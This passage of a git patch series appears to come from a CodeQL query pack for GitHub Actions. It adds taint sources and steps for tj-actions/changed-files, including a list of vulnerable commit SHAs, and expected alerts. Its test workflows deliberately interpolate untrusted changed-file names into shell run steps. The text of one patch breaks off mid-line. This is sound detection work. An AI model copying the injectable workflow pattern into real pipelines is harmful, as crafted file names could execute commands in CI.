ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutError.expected => PrivilegedUntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutWarning.expected => PrivilegedUntrustedCheckoutHigh.expected} (97%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref new file mode 100644 index 00000000000..8fe52c7d914 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected similarity index 97% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index 628234f7e8b..dc5a6bc915f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref new file mode 100644 index 00000000000..32953132a45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref deleted file mode 100644 index 1192fcfe616..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref deleted file mode 100644 index 8c77a95b48c..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutWarning.ql From 5d6a3c4900d427da833674a18796601c8e202a12 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Tue, 7 May 2024 09:45:12 +0200 Subject: [PATCH 0242/1267] Copy master branch only --- .github/workflows/copy-to-bughalla.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 572d987ce37..a6b568f2bfb 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -1,6 +1,9 @@ name: Copy to Bughalla -on: push +on: + push: + branches: + - 'master' permissions: contents: read From 778c6ad923c5164cb86ff53f0e3ac461830d5f77 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 7 May 2024 10:41:42 +0200 Subject: [PATCH 0243/1267] Fix tj-actions/changed-files sources --- .../codeql/actions/dataflow/FlowSources.qll | 38 +++++++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 +++++++++++++------ ql/lib/ext/tj-actions_changed-files.model.yml | 22 ------- .../tj-actions_verify-changed-files.model.yml | 6 -- .../.github/workflows/changed-files.yml | 31 +++++++--- .../Security/CWE-094/CodeInjection.expected | 12 ++-- .../CWE-094/PrivilegedCodeInjection.expected | 9 ++- 7 files changed, 118 insertions(+), 60 deletions(-) delete mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml delete mode 100644 ql/lib/ext/tj-actions_verify-changed-files.model.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index db111b9e190..b4cf1f70315 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -263,7 +263,7 @@ private class ArtifactSource extends RemoteFlowSource { /** * A list of file names returned by dorny/paths-filter. */ -private class DornyPathsFilterSource extends RemoteFlowSource { +class DornyPathsFilterSource extends RemoteFlowSource { DornyPathsFilterSource() { exists(UsesStep u | u.getCallee() = "dorny/paths-filter" and @@ -274,3 +274,39 @@ private class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. + */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/verify-changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 32c329d8c67..cb391f2a262 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -43,10 +44,6 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } -} - /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -119,28 +116,57 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - artifactDownloadToUseStep(node1, node2) - } -} - /** * A read of the _files field of the dorny/paths-filter action. */ predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesStep u, StepsExpression o | - u.getCallee() = "dorny/paths-filter" and - u.getArgument("list-files") = ["csv", "json"] and - u = pred.asExpr() and - o.getStepId() = u.getId() and + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName().matches("%_files") and succ.asExpr() = o ) } -class DornyPathsFilterTaintStep extends AdditionalTaintStep { +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - dornyPathsFilterTaintStep(node1, node2) + envToRunStep(node1, node2) or + artifactDownloadToUseStep(node1, node2) or + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) } } diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml deleted file mode 100644 index 60fa0149573..00000000000 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ /dev/null @@ -1,22 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml deleted file mode 100644 index 9dccf6d5e6c..00000000000 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 12bade510ba..85f59f6fa26 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -2,8 +2,6 @@ name: CI on: pull_request: - branches: - - main jobs: changed_files: @@ -13,13 +11,32 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - name: Get changed files - id: changed-files - uses: tj-actions/changed-files@v40 - - name: List all changed files + - name: Get changed files 1 + id: changed-files1 + uses: tj-actions/changed-files@v40 + - name: List all changed files 1 run: | - for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + for file in ${{ steps.changed-files1.outputs.all_changed_files }}; do echo "$file was changed" done + - name: Get changed files 2 + id: changed-files2 + uses: tj-actions/changed-files@v41 + - name: List all changed files 2 + run: | + for file in ${{ steps.changed-files2.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 3 + id: changed-files3 + uses: tj-actions/changed-files@v41 + with: + safe_output: false + - name: List all changed files 3 + run: | + for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e220d368b20..e9738fa9458 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -6,7 +6,8 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( Date: Tue, 7 May 2024 11:01:14 +0200 Subject: [PATCH 0244/1267] Update --- ql/test/library-tests/test.expected | 18 ------------------ .../PrivilegedUntrustedCheckoutHigh.expected | 2 +- 2 files changed, 1 insertion(+), 19 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index d7f944c5a3d..c735596ae05 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -455,24 +455,6 @@ sources | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | tj-actions/branch-names | * | output.ref_branch | branch | manual | -| tj-actions/changed-files | * | output.added_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_files | filename | manual | -| tj-actions/changed-files | * | output.all_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | -| tj-actions/changed-files | * | output.changed_keys | filename | manual | -| tj-actions/changed-files | * | output.copied_files | filename | manual | -| tj-actions/changed-files | * | output.deleted_files | filename | manual | -| tj-actions/changed-files | * | output.modified_files | filename | manual | -| tj-actions/changed-files | * | output.modified_keys | filename | manual | -| tj-actions/changed-files | * | output.other_changed_files | filename | manual | -| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | -| tj-actions/changed-files | * | output.other_modified_files | filename | manual | -| tj-actions/changed-files | * | output.renamed_files | filename | manual | -| tj-actions/changed-files | * | output.type_changed_files | filename | manual | -| tj-actions/changed-files | * | output.unknown_files | filename | manual | -| tj-actions/changed-files | * | output.unmerged_files | filename | manual | -| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915f..628234f7e8b 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 6a87192f6491a36d107c49e871228cf6488721a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:42:56 +0200 Subject: [PATCH 0245/1267] Account for insecure action versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 12 +++-- .../codeql/actions/dataflow/FlowSources.qll | 51 ++++++++++++++++++- .../.github/workflows/changed-files.yml | 18 +++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 32 ++++++------ 6 files changed, 98 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed..83787882d6f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -791,6 +791,8 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); + int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + /** Gets the argument expression for the given key. */ string getArgument(string key) { exists(ScalarValueImpl scalar | @@ -832,8 +834,10 @@ class UsesStepImpl extends StepImpl, UsesImpl { ).toLowerCase() } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + override string getVersion() { + result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") + } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -865,12 +869,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4) + then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") else none() ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b4cf1f70315..bfe85dbdbe6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -284,7 +284,54 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + u.getMajorVersion() < 41 or + u.getVersion() + .matches([ + "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", + "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", + "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", + "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", + "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", + "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", + "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", + "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", + "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", + "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", + "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", + "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", + "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", + "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", + "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", + "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", + "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", + "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", + "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", + "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", + "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", + "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", + "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", + "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", + "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", + "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", + "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", + "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", + "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", + "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", + "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", + "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", + "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", + "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", + "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", + "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", + "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", + "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", + "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", + "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", + "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", + "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", + "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", + "f0751de", "eef9423" + ] + "%") ) and this.asExpr() = u ) @@ -302,7 +349,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + u.getMajorVersion() < 17 ) and this.asExpr() = u ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 85f59f6fa26..6d506e65a13 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -40,3 +40,21 @@ jobs: for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do echo "$file was changed" done + + - name: Get changed files 4 + id: changed-files4 + uses: tj-actions/changed-files@0874344d6ebbaa00a27da73276ae7162fadcaf69 # v44.3.0 + - name: List all changed files 4 + run: | + for file in ${{ steps.changed-files4.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 5 + id: changed-files5 + uses: tj-actions/changed-files@95690f9ece77c1740f4a55b7f1de9023ed6b1f87 # v39.2.3 + - name: List all changed files 5 + run: | + for file in ${{ steps.changed-files5.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e9738fa9458..9e479f9eaf4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | @@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -247,6 +250,7 @@ subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | 